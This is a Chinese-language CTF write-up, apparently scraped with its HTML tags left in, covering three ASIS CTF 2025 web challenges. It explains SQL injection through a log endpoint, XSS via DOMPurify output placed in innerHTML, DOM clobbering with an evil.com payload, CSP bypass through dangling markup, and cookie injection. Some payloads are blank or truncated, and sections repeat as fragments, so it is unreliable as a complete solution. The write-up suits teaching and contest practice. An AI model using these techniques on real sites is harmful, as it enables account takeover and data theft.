ASIS CTF 2025 WEB WP<\/strong> 中几道题目的详细教学文档，涵盖关键漏洞点、利用方法和最终攻击链的完整分析。<\/p>

🧩 ScrapScrap I Revenge<\/h2>
题目背景<\/h3>
目标服务是一个允许用户抓取网站内容的 Web 应用，但只提供演示账户。目标是获取一个普通用户账户（role = 'user'）以访问 \/scrap<\/code> 路由获取 flag。<\/p>
关键代码分析<\/h3> 1. 路由与权限控制<\/h4> \/scrap<\/code> 路由仅对 role = 'user'<\/code> 的用户开放。<\/li> 默认注册用户 role 为 'demo'<\/code>，只有 superbot<\/code> 是 'user'<\/code>。<\/li> <\/ul> 2. SQL 注入点<\/h4> 在 \/debug\/create_log<\/code> 中存在 SQL 注入：<\/p> database<\/span>.exec<\/span>(`INSERT INTO logs VALUES('<\/span>${<\/span>req<\/span>.body<\/span>.log<\/span>}<\/span>'); ...`<\/span>); <\/span><\/span><\/code><\/pre>限制条件：<\/p> log<\/code> 长度 ≤ 50<\/li> 不能包含 \/<\/code> 和 -<\/code><\/li> 仅 role = 'user'<\/code> 可访问（即需 superbot 触发）<\/li> <\/ul> 3. XSS 触发点<\/h4> 在 checker.js<\/code> 中，错误信息渲染时存在 textContent → innerHTML 转换：<\/p> msg_url<\/span>.textContent<\/span> =<\/span> url<\/span>; <\/span><\/span>msg_url<\/span>.innerHTML<\/span> =<\/span> DOMPurify<\/span>.sanitize<\/span>(msg_url<\/span>.textContent<\/span>); <\/span><\/span><\/code><\/pre>利用 textContent<\/code> 可包含 HTML 标签但不会被转义，再通过 innerHTML<\/code> 渲染触发 XSS。<\/p> 利用步骤<\/h3> 第一步：构造 XSS Payload<\/h4> Payload 需满足：<\/p> 长度 ≤ 50<\/li> 不含 \/<\/code> 和 -<\/code><\/li> 触发 XSS 后发起 POST 请求修改当前用户 role<\/li> <\/ul> 示例 Payload：<\/p> http:\/\/ <\/span><\/span><\/span><\/code><\/pre>第二步：绕过 8 秒超时<\/h4> 使用延迟响应服务器或构造页面自动跳转绕过超时限制。<\/li> <\/ul> 第三步：触发 superbot 访问<\/h4> 提交构造的 URL 给 superbot，触发 XSS，执行 SQL 注入：<\/li> <\/ul> UPDATE<\/span> users SET<\/span> role<\/span>=<\/span>'user'<\/span> WHERE<\/span> username=<\/span>'your_username'<\/span>; <\/span><\/span><\/code><\/pre>第四步：访问 \/scrap<\/h4> 登录后访问 \/scrap<\/code> 即可获取 flag。<\/li> <\/ul> 🎯 Under the Beamers Revenge<\/h2> 题目背景<\/h3> 通过 iframe srcdoc 渲染用户输入，使用 DOMPurify 过滤，但存在 DOM Clobbering 漏洞。<\/p> 关键代码分析<\/h3> 1. 初始化配置<\/h4> <script<\/span>> <\/span><\/span> window.Beamer<\/span> =<\/span> window.Beamer<\/span> ||<\/span> {}; <\/span><\/span> BeamerConfig<\/span> =<\/span> { product_id<\/span>:<\/span> '123'<\/span>, language<\/span>:<\/span> 'FR'<\/span> }; <\/span><\/span><\/script<\/span>> <\/span><\/span><script<\/span> src<\/span>=<\/span>"\/static\/beamer.js"<\/span>><\/script<\/span>> <\/span><\/span><\/code><\/pre>2. DOM Clobbering 漏洞<\/h4> 通过 HTML 标签覆盖 window.Beamer<\/code> 的属性。<\/li> 目标是覆盖 escapeHtml<\/code> 函数，使其失效。<\/li> <\/ul> 3. 触发路径<\/h4> 调用 Beamer.update()<\/code> → appendAlert()<\/code> → appendUtilitiesIframe()<\/code> → 使用 escapeHtml<\/code> 过滤失败，导致 XSS。<\/li> <\/ul> 利用步骤<\/h3> 第一步：构造 DOM Clobbering Payload<\/h4> <a<\/span> id<\/span>=<\/span>Beamer<\/span>><a<\/span> id<\/span>=<\/span>Beamer-name<\/span>><\/a<\/span>><a<\/span> id<\/span>=<\/span>Beamer-customDomain<\/span>>http:\/\/evil.com<\/a<\/span>> <\/span><\/span><\/code><\/pre>第二步：触发 update 方法<\/h4> Beamer<\/span>.update<\/span>({ language<\/span>:<\/span> 'FR'<\/span> }); <\/span><\/span><\/code><\/pre>第三步：绕过 DOMPurify<\/h4> 通过 Clobbering 使 escapeHtml<\/code> 失效，导致 customDomain<\/code> 被直接写入 iframe，触发 XSS。<\/li> <\/ul> 📝 SatoNote (2 solves)<\/h2> 题目背景<\/h3> 笔记应用，目标获取管理员笔记中的 flag。<\/p> 关键漏洞<\/h3> 1. CSP 绕过<\/h4> \/profile<\/code> 路由的 CSP 通过 Meta 标签设置，可通过悬空标记（Dangling Markup）注入绕过。<\/li> <\/ul> 2. Preload Scanner<\/h4> 浏览器预加载扫描器可提前加载资源，用于泄露用户 UUID。<\/li> <\/ul> 3. Cookie Sandwich<\/h4> 通过设置 Cookie 绕过权限控制。<\/li> <\/ul> 利用步骤<\/h3> 第一步：悬空 Meta 标签<\/h4> <\/span><\/span><\/code><\/pre>第三步：Cookie 注入<\/h4> 通过 XSS 设置 Cookie，提升权限为管理员。<\/li> <\/ul> 第四步：读取管理员笔记<\/h4> 直接访问管理员笔记 API 获取 flag。<\/li> <\/ul> ✅ 总结<\/h2> 题目<\/th> 漏洞类型<\/th> 关键技巧<\/th> <\/tr> <\/thead> ScrapScrap I Revenge<\/td> SQLi + XSS<\/td> textContent → innerHTML<\/td> <\/tr> Under the Beamers<\/td> DOM Clobbering<\/td> 覆盖 Beamer 属性<\/td> <\/tr> SatoNote<\/td> CSP绕过 + Preload<\/td> 悬空标记 + Cookie注入<\/td> <\/tr> <\/tbody> <\/table> 如果有新的题目或补充内容，可随时提供进一步分析。<\/p>

题目<\/th>	漏洞类型<\/th>	关键技巧<\/th> <\/tr> <\/thead>
ScrapScrap I Revenge<\/td>	SQLi + XSS<\/td>	textContent → innerHTML<\/td> <\/tr>
Under the Beamers<\/td>	DOM Clobbering<\/td>	覆盖 Beamer 属性<\/td> <\/tr>
SatoNote<\/td>	CSP绕过 + Preload<\/td>	悬空标记 + Cookie注入<\/td> <\/tr> <\/tbody> <\/table> 如果有新的题目或补充内容，可随时提供进一步分析。<\/p>

🧩 ScrapScrap I Revenge<\/h2>

题目背景<\/h3> 目标服务是一个允许用户抓取网站内容的 Web 应用，但只提供演示账户。目标是获取一个普通用户账户（role = 'user'）以访问 \/scrap<\/code> 路由获取 flag。<\/p>

🎯 Under the Beamers Revenge<\/h2>

题目背景<\/h3> 通过 iframe srcdoc 渲染用户输入，使用 DOMPurify 过滤，但存在 DOM Clobbering 漏洞。<\/p>

关键代码分析<\/h3>

利用步骤<\/h3>

📝 SatoNote (2 solves)<\/h2>

题目背景<\/h3> 笔记应用，目标获取管理员笔记中的 flag。<\/p>

关键漏洞<\/h3>

利用步骤<\/h3>

题目背景<\/h3>
目标服务是一个允许用户抓取网站内容的 Web 应用，但只提供演示账户。目标是获取一个普通用户账户（role = 'user'）以访问 `\/scrap<\/code> 路由获取 flag。<\/p>`

题目背景<\/h3>
通过 iframe srcdoc 渲染用户输入，使用 DOMPurify 过滤，但存在 DOM Clobbering 漏洞。<\/p>

题目背景<\/h3>
笔记应用，目标获取管理员笔记中的 flag。<\/p>